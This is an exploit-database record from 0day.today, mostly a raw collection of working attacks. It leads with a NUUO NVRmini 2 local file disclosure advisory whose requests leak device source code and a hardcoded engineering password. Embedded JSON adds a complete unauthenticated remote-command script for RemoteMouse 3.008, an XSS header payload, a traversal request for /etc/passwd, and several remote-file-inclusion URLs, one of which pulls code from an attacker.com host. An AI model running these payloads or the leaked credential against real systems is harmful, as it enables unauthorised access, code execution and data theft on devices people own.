ID 1337DAY-ID-25218 Type zdt Reporter LiquidWorm Modified 2016-08-06T00:00:00
Description
Exploit for php platform in category web applications
NUUO Local File Disclosure Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure
vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script
is not properly verified before being used to include files. This can be exploited
to disclose contents of files from local resources.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5350
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php
14.01.2016
--
Request:
--------
GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1
Response:
---------
<?php
include('utils.php');
header("Expires: Thu, 19 Nov 1981 08:52:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");
session_start();
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>DatTool</title>
</head>
<body>
<?php
if (isset($_POST) && isset($_POST['username']) && isset($_POST['password']))
{
if ($_POST['username'] != 'nuuoeng' || $_POST['password'] != 'qwe23622260')
{
exit(0);
}
if (isset($_POST['act']) && $_POST['act'] == 'checkdat')
{
echo '<script language="javascript">';
echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")';
echo '</script>';
touch(constant("FLASH_FOLDER")."/checkdat");
}
?>
<p>Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.</p>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
<input type="hidden" name="username" value="<?php echo $_POST['username']; ?>">
<input type="hidden" name="password" value="<?php echo htmlspecialchars( $_POST['password'] ); ?>">
<input type="hidden" name="act" value="checkdat">
<input type="submit" value="Repair" name="submit" >
</form>
<?php
}
else
{
?>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
Usermame: <input type="text" size="15" name="username" value=""><br />
Password: <input type="password" size="15" name="password" value=""><br />
<input type="submit" value="Submit" name="submit" >
</form>
<?php
}
?>
</body>
</html>
============================================================================
Request:
--------
GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1
Response:
---------
<?php
if(!isset($_GET['css']))exit('/* please supply a "css" parameter */');
$filename=$_GET['css'];
if(strpos($filename,'..')!==false)exit('/* please use an absolute address for your css */');
$filename=$_SERVER['DOCUMENT_ROOT'].'/'.$filename;
if(!file_exists($filename))exit('/* referred css file does not exist */');
header('content-type:text/css');
header("Expires: ".gmdate("D, d M Y H:i:s", (time()+900)) . " GMT");
$matches=array();
$names=array();
$values=array();
$file=file_get_contents($filename);
foreach ($_GET as $key=>$value)
{
//echo "Key: $key; Value: $value <br/>\n ";
if ($key != 'css')
{
$file = str_replace($key,$value,$file);
}
//system("echo \"Key: $key; Value: $value <br/>\n \" >> $filename");
}
echo $file;
/*
foreach(array_reverse($matches[0]) as $match){
$match=preg_replace('/\s+/',' ',rtrim(ltrim($match)));
$names[]=preg_replace('/\s.*//*','',$match);
$values[]=preg_replace('/^[^\s]*\s/','',$match);
}
*/
?>
# 0day.today [2018-01-02] #
{"published": "2016-08-06T00:00:00", "id": "1337DAY-ID-25218", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["description", "published", "modified", "sourceHref", "sourceData", "title", "href"], "edition": 1, "lastseen": "2016-04-20T01:50:48", "bulletin": {"published": "2016-04-14T00:00:00", "id": "1337DAY-ID-25218", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.4, "modified": "2016-04-20T01:50:48"}}, "hash": "8b169529c1ea7200816a5f6e43b102668de7856b3ee67d9e4e32740a3b74d9c3", "description": "OpenWGA Content Manager version 7.1.9 suffers from a cross site scripting vulnerability when input passed via the User-Agent HTTP header is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.", "type": "zdt", "lastseen": "2016-04-20T01:50:48", "edition": 1, "title": "OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS Vulnerability", "href": "http://0day.today/exploit/description/25218", "modified": "2016-04-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/25218", "references": [], "reporter": "LiquidWorm", "sourceData": "OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS Vulnerability\r\n\r\n\r\nVendor: Innovation Gate GmbH\r\nProduct web page: https://www.openwga.com\r\nAffected version: OpenWGA Content Manager 7.1.9 (Build 230)\r\n OpenWGA Admin Client 7.1.7 (Build 82)\r\n OpenWGA Server 7.1.9 Maintenance Release (Build 642)\r\n\r\nSummary: OpenWGA is an advanced open source java based enterprise CMS\r\nplatform featuring real WYSIWYG, a state of the art CMS IDE and more.\r\n\r\nDesc: OpenWGA suffers from a cross-site scripting vulnerability when\r\ninput passed via the User-Agent HTTP header is not properly sanitized\r\nbefore being returned to the user. This can be exploited to execute\r\narbitrary HTML and script code in a user's browser session in context\r\nof an affected site.\r\n\r\nTested on: Apache/2.2.14 (Ubuntu)\r\n Apache Tomcat/6.0.41\r\n Apache-Coyote/1.1\r\n\r\n--\r\n\r\n\r\nRequest:\r\n--------\r\n\r\nGET /plugin-contentmanager HTTP/1.1\r\nHost: localhost:8080\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: <script>alert(1)</script>\r\nConnection: close\r\n\r\n\r\nResponse:\r\n---------\r\n\r\nHTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nSet-Cookie: WGLastRedirectHex=; Path=/; Max-Age=0; HttpOnly\r\nPragma: No-Cache\r\nCache-Control: No-Cache\r\nContent-Type: text/html;charset=UTF-8\r\nDate: Tue, 23 Feb 2016 14:02:49 GMT\r\nConnection: close\r\nContent-Length: 1902\r\n\r\n\r\n<html>\r\n<head>\r\n<title>browser not supported: OpenWGA\u2122 Content Manager Version 7.1.9 Build 230</title>\r\n<meta name=\"generator\" content=\"OpenWGA... Server 7 'Wolf' Platform\">\r\n\r\n<span style=\"font-weight:bold\"><script>alert(1)</script></span>\r\n\r\n---\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "7285786dae6d90dc7a88d5a9ee01d650", "key": "sourceData"}, {"hash": "085b94284d43bdb03b4bfd3ce2486454", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "1139d22e83d0f3d97cdbe8b1249e2c9d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "720a71c9a4d67e5598162d7e42fbc6b2", "key": "sourceHref"}, {"hash": "72437e7b05aab12a2a63f521048817dc", "key": "title"}, {"hash": "ccc017a1217287c0cb486c39648ceaab", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "1139d22e83d0f3d97cdbe8b1249e2c9d", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "1068580c4a04a1260eb96d59202de5b2ff024e94021e87e9687d20e22d1b6ef2", "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "zeroscience", "idList": ["ZSL-2016-5350"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25218", "SECURITYVULNS:VULN:11274"]}, {"type": "zdt", "idList": ["1337DAY-ID-5350", "1337DAY-ID-4160", "1337DAY-ID-1902", "1337DAY-ID-642"]}], "modified": "2018-01-02T17:10:33"}, "vulnersScore": 2.1}, "type": "zdt", "lastseen": "2018-01-02T17:10:33", "edition": 2, "title": "NUUO NVRmini 2 3.0.8 - Local File Disclosure", "href": "https://0day.today/exploit/description/25218", "modified": "2016-08-06T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": [], "sourceHref": "https://0day.today/exploit/25218", "references": [], "reporter": "LiquidWorm", "sourceData": "NUUO Local File Disclosure Vulnerability\r\n \r\n \r\nVendor: NUUO Inc.\r\nProduct web page: http://www.nuuo.com\r\nAffected version: <=3.0.8 (NE-4160, NT-4040)\r\n \r\nSummary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS\r\nfunctionality. Setup is simple and easy, with automatic port forwarding\r\nsettings built in. NVRmini 2 supports POS integration, making this the perfect\r\nsolution for small retail chain stores. NVRmini 2 also comes full equipped as\r\na NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping\r\nand RAID functions for data protection. Choose NVR and know that your valuable video\r\ndata is safe, always.\r\n \r\nDesc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure\r\nvulnerability when input passed thru the 'css' parameter to 'css_parser.php' script\r\nis not properly verified before being used to include files. This can be exploited\r\nto disclose contents of files from local resources.\r\n \r\n \r\nTested on: GNU/Linux 3.0.8 (armv7l)\r\n GNU/Linux 2.6.31.8 (armv5tel)\r\n lighttpd/1.4.28\r\n PHP/5.5.3\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5350\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php\r\n \r\n \r\n14.01.2016\r\n \r\n--\r\n \r\n \r\nRequest:\r\n--------\r\nGET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1\r\n \r\n \r\nResponse:\r\n---------\r\n \r\n<?php\r\ninclude('utils.php');\r\nheader(\"Expires: Thu, 19 Nov 1981 08:52:00 GMT\");\r\nheader(\"Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\");\r\nheader(\"Pragma: no-cache\");\r\n \r\nsession_start();\r\n?>\r\n<html>\r\n<head>\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\r\n <title>DatTool</title>\r\n</head>\r\n<body>\r\n<?php\r\nif (isset($_POST) && isset($_POST['username']) && isset($_POST['password']))\r\n{\r\n if ($_POST['username'] != 'nuuoeng' || $_POST['password'] != 'qwe23622260')\r\n {\r\n exit(0);\r\n }\r\n \r\n if (isset($_POST['act']) && $_POST['act'] == 'checkdat')\r\n {\r\n echo '<script language=\"javascript\">';\r\n echo 'alert(\"The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.\")';\r\n echo '</script>';\r\n touch(constant(\"FLASH_FOLDER\").\"/checkdat\");\r\n }\r\n?>\r\n \r\n<p>Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.</p>\r\n<form method=\"POST\" action=\"<?php echo $_SERVER['PHP_SELF']; ?>\" name=\"form0\">\r\n<input type=\"hidden\" name=\"username\" value=\"<?php echo $_POST['username']; ?>\">\r\n<input type=\"hidden\" name=\"password\" value=\"<?php echo htmlspecialchars( $_POST['password'] ); ?>\">\r\n<input type=\"hidden\" name=\"act\" value=\"checkdat\">\r\n<input type=\"submit\" value=\"Repair\" name=\"submit\" >\r\n</form>\r\n \r\n<?php\r\n}\r\nelse\r\n{\r\n?>\r\n<form method=\"POST\" action=\"<?php echo $_SERVER['PHP_SELF']; ?>\" name=\"form0\">\r\nUsermame: <input type=\"text\" size=\"15\" name=\"username\" value=\"\"><br />\r\nPassword: <input type=\"password\" size=\"15\" name=\"password\" value=\"\"><br />\r\n<input type=\"submit\" value=\"Submit\" name=\"submit\" >\r\n</form>\r\n<?php\r\n}\r\n \r\n?>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\n============================================================================\r\n \r\nRequest:\r\n--------\r\n \r\nGET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1\r\n \r\n \r\nResponse:\r\n---------\r\n \r\n<?php\r\n \r\nif(!isset($_GET['css']))exit('/* please supply a \"css\" parameter */');\r\n$filename=$_GET['css'];\r\n \r\nif(strpos($filename,'..')!==false)exit('/* please use an absolute address for your css */');\r\n$filename=$_SERVER['DOCUMENT_ROOT'].'/'.$filename;\r\nif(!file_exists($filename))exit('/* referred css file does not exist */');\r\n \r\nheader('content-type:text/css');\r\nheader(\"Expires: \".gmdate(\"D, d M Y H:i:s\", (time()+900)) . \" GMT\");\r\n \r\n$matches=array();\r\n$names=array();\r\n$values=array();\r\n$file=file_get_contents($filename);\r\nforeach ($_GET as $key=>$value) \r\n{\r\n //echo \"Key: $key; Value: $value <br/>\\n \";\r\n if ($key != 'css')\r\n {\r\n $file = str_replace($key,$value,$file);\r\n }\r\n //system(\"echo \\\"Key: $key; Value: $value <br/>\\n \\\" >> $filename\");\r\n} \r\n \r\necho $file;\r\n \r\n/*\r\nforeach(array_reverse($matches[0]) as $match){\r\n $match=preg_replace('/\\s+/',' ',rtrim(ltrim($match)));\r\n $names[]=preg_replace('/\\s.*//*','',$match);\r\n $values[]=preg_replace('/^[^\\s]*\\s/','',$match);\r\n}\r\n*/\r\n \r\n?>\n\n# 0day.today [2018-01-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b487e33d78006e4227140128c6deb3d9", "key": "href"}, {"hash": "67673263860bbeff909217b6feae0fc5", "key": "modified"}, {"hash": "67673263860bbeff909217b6feae0fc5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "7d486e32b6b32d3307df8b477808f6f3", "key": "sourceData"}, {"hash": "357e0a40c7e5684c4fdac9b773dc3a05", "key": "sourceHref"}, {"hash": "9765631df43f8dc50c9d26cedcf19287", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2019-04-17T19:39:20", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-04-15T00:00:00", "published": "2019-04-15T00:00:00", "id": "1337DAY-ID-32539", "href": "https://0day.today/exploit/description/32539", "title": "RemoteMouse 3.008 - Arbitrary Remote Command Execution Exploit", "type": "zdt", "sourceData": "\"\"\"\r\n# Exploit Title: Remote Mouse 3.008 Failure to Authenticate\r\n# Date: 4/9/2019\r\n# Exploit Author: 0rphon\r\n# Software Link: https://www.remotemouse.net/\r\n# Version: 3.008\r\n# Tested on: Windows 10\r\n\r\nRemote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it\r\nThis script pops calc as proof of concept (albeit a bit slowly)\r\nIt also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself\r\n\"\"\"\r\n\r\n#!/usr/bin/python2\r\nfrom socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM\r\nfrom time import sleep\r\nfrom sys import argv\r\n\r\ndef Ping(ip):\r\n try:\r\n target = socket(AF_INET, SOCK_STREAM)\r\n target.settimeout(5)\r\n target.connect((ip, 1978))\r\n response=target.recv(1048)\r\n target.close()\r\n if response==\"SIN 15win nop nop 300\":\r\n return True\r\n else: return False\r\n except:\r\n print(\"ERROR: Request timed out\")\r\n\r\n\r\n\r\ndef MoveMouse(x,y,ip):\r\n def SendMouse(command,times,ip):\r\n for x in range(times):\r\n target = socket(AF_INET, SOCK_DGRAM)\r\n target.sendto(command,(ip,1978))\r\n sleep(0.001)\r\n if x>0:\r\n command=\"mos 5m 1 0\"\r\n SendMouse(command,x,ip)\r\n elif x<0:\r\n x=x*-1\r\n command=\"mos 5m -1 0\"\r\n SendMouse(command,x,ip)\r\n if y>0:\r\n command=\"mos 5m 0 1\"\r\n SendMouse(command,y,ip)\r\n elif y<0:\r\n y=y*-1\r\n command=\"mos 6m 0 -1\"\r\n SendMouse(command,y,ip)\r\n\r\n\r\n\r\ndef MousePress(command,ip,action=\"click\"):\r\n if action==\"down\":\r\n target = socket(AF_INET, SOCK_DGRAM)\r\n target.sendto((command+\" d\"),(ip,1978))\r\n elif action==\"up\":\r\n target = socket(AF_INET, SOCK_DGRAM)\r\n target.sendto((command+\" u\"),(ip,1978))\r\n elif action==\"click\":\r\n target = socket(AF_INET, SOCK_DGRAM)\r\n target.sendto((command+\" d\"),(ip,1978))\r\n target.sendto((command+\" u\"),(ip,1978))\r\n else: raise Exception('MousePress: No action named \"'+str(action)+'\"')\r\n\r\n\r\ndef SendString(string,ip):\r\n for char in string:\r\n target = socket(AF_INET, SOCK_DGRAM)\r\n target.sendto(characters[char],(ip,1978))\r\n \r\n\r\n\r\nclass mouse:\r\n leftClick=\"mos 5R l\"\r\n rightClick=\"mos 5R r\"\r\n middleClick=\"mos 5R m\"\r\n\r\ncharacters={\r\n \"A\":\"key 8[ras]116\", \"B\":\"key 8[ras]119\", \"C\":\"key 8[ras]118\", \"D\":\"key 8[ras]113\", \"E\":\"key 8[ras]112\", \r\n \"F\":\"key 8[ras]115\", \"G\":\"key 8[ras]114\", \"H\":\"key 8[ras]125\", \"I\":\"key 8[ras]124\", \"J\":\"key 8[ras]127\", \r\n \"K\":\"key 8[ras]126\", \"L\":\"key 8[ras]121\", \"M\":\"key 8[ras]120\", \"N\":\"key 8[ras]123\", \"O\":\"key 8[ras]122\", \r\n \"P\":\"key 8[ras]101\", \"Q\":\"key 8[ras]100\", \"R\":\"key 8[ras]103\", \"S\":\"key 8[ras]102\", \"T\":\"key 7[ras]97\", \r\n \"U\":\"key 7[ras]96\", \"V\":\"key 7[ras]99\", \"W\":\"key 7[ras]98\", \"X\":\"key 8[ras]109\", \"Y\":\"key 8[ras]108\", \r\n \"Z\":\"key 8[ras]111\",\r\n\r\n \"a\":\"key 7[ras]84\", \"b\":\"key 7[ras]87\", \"c\":\"key 7[ras]86\", \"d\":\"key 7[ras]81\", \"e\":\"key 7[ras]80\", \r\n \"f\":\"key 7[ras]83\", \"g\":\"key 7[ras]82\", \"h\":\"key 7[ras]93\", \"i\":\"key 7[ras]92\", \"j\":\"key 7[ras]95\", \r\n \"k\":\"key 7[ras]94\", \"l\":\"key 7[ras]89\", \"m\":\"key 7[ras]88\", \"n\":\"key 7[ras]91\", \"o\":\"key 7[ras]90\", \r\n \"p\":\"key 7[ras]69\", \"q\":\"key 7[ras]68\", \"r\":\"key 7[ras]71\", \"s\":\"key 7[ras]70\", \"t\":\"key 7[ras]65\", \r\n \"u\":\"key 7[ras]64\", \"v\":\"key 7[ras]67\", \"w\":\"key 7[ras]66\", \"x\":\"key 7[ras]77\", \"y\":\"key 7[ras]76\", \r\n \"z\":\"key 7[ras]79\",\r\n\r\n \"1\":\"key 6[ras]4\", \"2\":\"key 6[ras]7\", \"3\":\"key 6[ras]6\", \"4\":\"key 6[ras]1\", \"5\":\"key 6[ras]0\",\r\n \"6\":\"key 6[ras]3\", \"7\":\"key 6[ras]2\", \"8\":\"key 6[ras]13\", \"9\":\"key 6[ras]12\", \"x0\":\"key 6[ras]5\",\r\n\r\n \"\\n\":\"key 3RTN\", \"\\b\":\"key 3BAS\", \" \":\"key 7[ras]21\",\r\n\r\n \"+\":\"key 7[ras]30\", \"=\":\"key 6[ras]8\", \"/\":\"key 7[ras]26\", \"_\":\"key 8[ras]106\", \"<\":\"key 6[ras]9\", \r\n \">\":\"key 7[ras]11\", \"[\":\"key 8[ras]110\", \"]\":\"key 8[ras]104\", \"!\":\"key 7[ras]20\", \"@\":\"key 8[ras]117\", \r\n \"#\":\"key 7[ras]22\", \"$\":\"key 7[ras]17\", \"%\":\"key 7[ras]16\", \"^\":\"key 8[ras]107\", \"&\":\"key 7[ras]19\", \r\n \"*\":\"key 7[ras]31\", \"(\":\"key 7[ras]29\", \")\":\"key 7[ras]28\", \"-\":\"key 7[ras]24\", \"'\":\"key 7[ras]18\", \r\n '\"':\"key 7[ras]23\", \":\":\"key 7[ras]15\", \";\":\"key 7[ras]14\", \"?\":\"key 7[ras]10\", \"`\":\"key 7[ras]85\", \r\n \"~\":\"key 7[ras]75\", \"\\\\\":\"key 8[ras]105\", \"|\":\"key 7[ras]73\", \"{\":\"key 7[ras]78\", \"}\":\"key 7[ras]72\",\r\n \",\":\"key 7[ras]25\", \".\":\"key 7[ras]27\"\r\n}\r\n\r\n\r\ndef PopCalc(ip):\r\n MoveMouse(-5000,3000,ip)\r\n MousePress(mouse.leftClick,ip)\r\n sleep(1)\r\n SendString(\"calc.exe\",ip)\r\n sleep(1)\r\n SendString(\"\\n\",ip)\r\n print(\"SUCCESS! Process calc.exe has run on target\",ip)\r\n\r\n\r\ndef main():\r\n try:\r\n targetIP=argv[1]\r\n except:\r\n print(\"ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1\")\r\n exit()\r\n if Ping(targetIP)==True:\r\n PopCalc(targetIP)\r\n else:\r\n print(\"ERROR: Target machine is not running RemoteMouse\")\r\n exit()\r\n\r\nif __name__==\"__main__\":\r\n main()\n\n# 0day.today [2019-04-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32539"}, {"lastseen": "2018-01-09T15:09:34", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-06-11T00:00:00", "published": "2009-06-11T00:00:00", "id": "1337DAY-ID-5350", "href": "https://0day.today/exploit/description/5350", "type": "zdt", "title": "phpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln", "sourceData": "=================================================================\r\nphpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln\r\n=================================================================\r\n\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n Name : phpwebthings <= 1.5.2\r\n Site : http://sourceforge.net/projects/phpwebthings/\r\n\r\n Down : http://sourceforge.net/project/downloading.php?group_id=19103&filename=phpwebthings_1_5_2.zip&a=46042396\r\n\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n \r\n Found By : br0ly\r\n Made in : Brasil\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n\r\n Description:\r\n\r\n Bug : Local File Inclusion\r\n \r\n Look this: \r\n\r\n <?php theme_draw_centerbox_open(\"Help\");\r\n if (isset($_GET[\"module\"])) include(\"modules/{$_GET[\"module\"]}/lang/help_{$cfg[\"core\"][\"lang\"]}.php\"); <-- Vul \r\n\r\n else include(\"lang/help_{$cfg[\"core\"][\"lang\"]}.php\");\r\n\r\n\r\n\r\n If magic_quotes_gpc=off --> LFI; \r\n\r\n\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n\r\n P0c:\r\n \r\n LFI:http://localhost/Scripts/phpwebthings_1_5_2/help?module=../../../../../../../../../../../../etc/passwd%00\r\n\r\n\r\n\r\n OBS: need register_globals=on;\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n\r\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5350"}, {"lastseen": "2018-04-09T17:40:47", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-11T00:00:00", "published": "2008-11-11T00:00:00", "id": "1337DAY-ID-4160", "href": "https://0day.today/exploit/description/4160", "type": "zdt", "title": "Joomla Component Simple RSS Reader 1.0 RFI Vulnerability", "sourceData": "========================================================\r\nJoomla Component Simple RSS Reader 1.0 RFI Vulnerability\r\n========================================================\r\n\r\n\r\n================================================================================================================================\r\n\r\n\r\n [o] Simple RSS Reader Component 1.0 Remote File Inclusion Vulnerability\r\n\r\n Software : com_rssreader version 1.0\r\n Vendor : http://www.joomlashop.dk/\r\n Download : http://extensions.joomlashop.dk/index.php?option=com_docman&task=cat_view&gid=16&Itemid=47\r\n Author : NoGe\r\n\r\n================================================================================================================================\r\n\r\n\r\n [o] Vulnerable file\r\n\r\n administrator/components/com_rssreader/admin.rssreader.php\r\n\r\n include( \"$mosConfig_live_site/components/com_rssreader/about.html\" );\r\n\r\n\r\n\r\n [o] Exploit\r\n\r\n http://localhost/[path]/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=[evilcode]\r\n\r\n\r\n================================================================================================================================\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4160"}, {"lastseen": "2018-04-10T05:38:52", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-05-23T00:00:00", "published": "2007-05-23T00:00:00", "id": "1337DAY-ID-1902", "href": "https://0day.today/exploit/description/1902", "type": "zdt", "title": "Scallywag (template.php path) Remote File Inclusion Vulnerabilities", "sourceData": "===================================================================\r\nScallywag (template.php path) Remote File Inclusion Vulnerabilities\r\n===================================================================\r\n\r\n\r\n\r\n##############################################################################################\r\n#Scallywag <= Remote File Inclusion Vulnerability #\r\n# # \r\n#Dork:\"Powered by Scallywag\" #\r\n# #\r\n# # \r\n##############################################################################################\r\n#Vuln Code # \r\n# # \r\n#ERROR1:skin/dark/template.php # \r\n# # \r\n# <?php # \r\n# include(\"$path/source/top.txt\"); <<< RFI CODE # \r\n# # \r\n# # \r\n#BUG1: # \r\n# # \r\n#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]] #\r\n############################################################################################## \r\n# # \r\n#ERROR2:skin/gold/template.php # \r\n# # \r\n# <?php # \r\n# include(\"$path/source/top.txt\"); <<< RFI CODE # \r\n# # \r\n# # \r\n#BUG2: # \r\n# # \r\n#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL Script]] #\r\n##############################################################################################\r\n# # \r\n#ERROR3:skin/original/template.php # \r\n# # \r\n# <?php # \r\n# include(\"$path/source/top.txt\"); <<< RFI CODE #\r\n# # \r\n# # \r\n#BUG3: # \r\n# # \r\n#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL Script]] #\r\n############################################################################################## # \r\n##############################################################################################\r\n##############################################################################################\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/1902"}, {"lastseen": "2018-04-14T22:01:26", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-08-07T00:00:00", "published": "2006-08-07T00:00:00", "id": "1337DAY-ID-642", "href": "https://0day.today/exploit/description/642", "type": "zdt", "title": "PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion Vulnerability", "sourceData": "=====================================================================\r\nPHP Live Helper <= 2.0 (abs_path) Remote File Inclusion Vulnerability\r\n=====================================================================\r\n\r\n\r\n\r\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\\r\n | __)_ / \\ \\// ~ \\/ | \\\r\n | \\\\ \\___\\ Y / | \\\r\n/_______ / \\______ /\\___|_ /\\_______ /\r\n \\/ \\/ \\/ \\/ .OR.ID\r\nECHO_ADV_43$2006\r\n\r\n------------------------------------------------------------------------------\r\n[ECHO_ADV_43$2006] PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion\r\n------------------------------------------------------------------------------\r\n\r\nAuthor\t\t: Ahmad Maulana a.k.a Matdhule\r\nDate Found\t: July, 02nd 2006\r\nLocation\t: Indonesia, Jakarta\r\nCritical Lvl\t: Highly critical\r\nImpact\t\t: System access\r\nWhere\t\t: From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nPHP Live Helper\r\n\r\nApplication\t: PHP Live Helper\r\nversion\t\t: Latest version [2.0]\r\nURL\t\t: http://www.turnkeywebtools.com/phplivehelper\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~~~\r\n\r\n-----------------------global.php----------------------\r\n....\r\n<?PHP\r\n/*\r\n global.php - 05/30/2006 - 5:27pm PST - 2.0\r\n \r\n PHP Live Helper\r\n http://www.turnkeywebtools.com/phplivehelper/\r\n \r\n Copyright (c) 2001-2006 Turnkey Web Tools, Inc.\r\n*/\r\n\r\ndefine('PLH_SESSION_START', '1');\r\n\r\n////////////////////////////\r\n// Load Class & Secure Files\r\n////////////////////////////\r\n\r\nrequire_once $abs_path.\"/libsecure.php\";\r\ninclude_once $abs_path.\"/include/class.browser.php\";\r\n...\r\n----------------------------------------------------------\r\n\r\nInput passed to the \"abs_path\" parameter in global.php is not\r\nproperly verified before being used. This can be exploited to execute\r\narbitrary PHP code by including files from local or external\r\nresources.\r\n\r\nProof Of Concept:\r\n~~~~~~~~~~~~~~~\r\n\r\nhttp://target.com/[phplivehelper_path]/global.php?abs_path=http://attacker.com/inject.txt?\r\n\r\nSolution:\r\n~~~~~~~\r\n- Sanitize variable $abs_path on global.php.\r\n\r\nNotification:\r\n~~~~~~~~~~\r\n\r\nI've been contacting the web/software administrator to tell about this hole in his system, \r\nbut instead of giving a nice response, he replied so rudely and 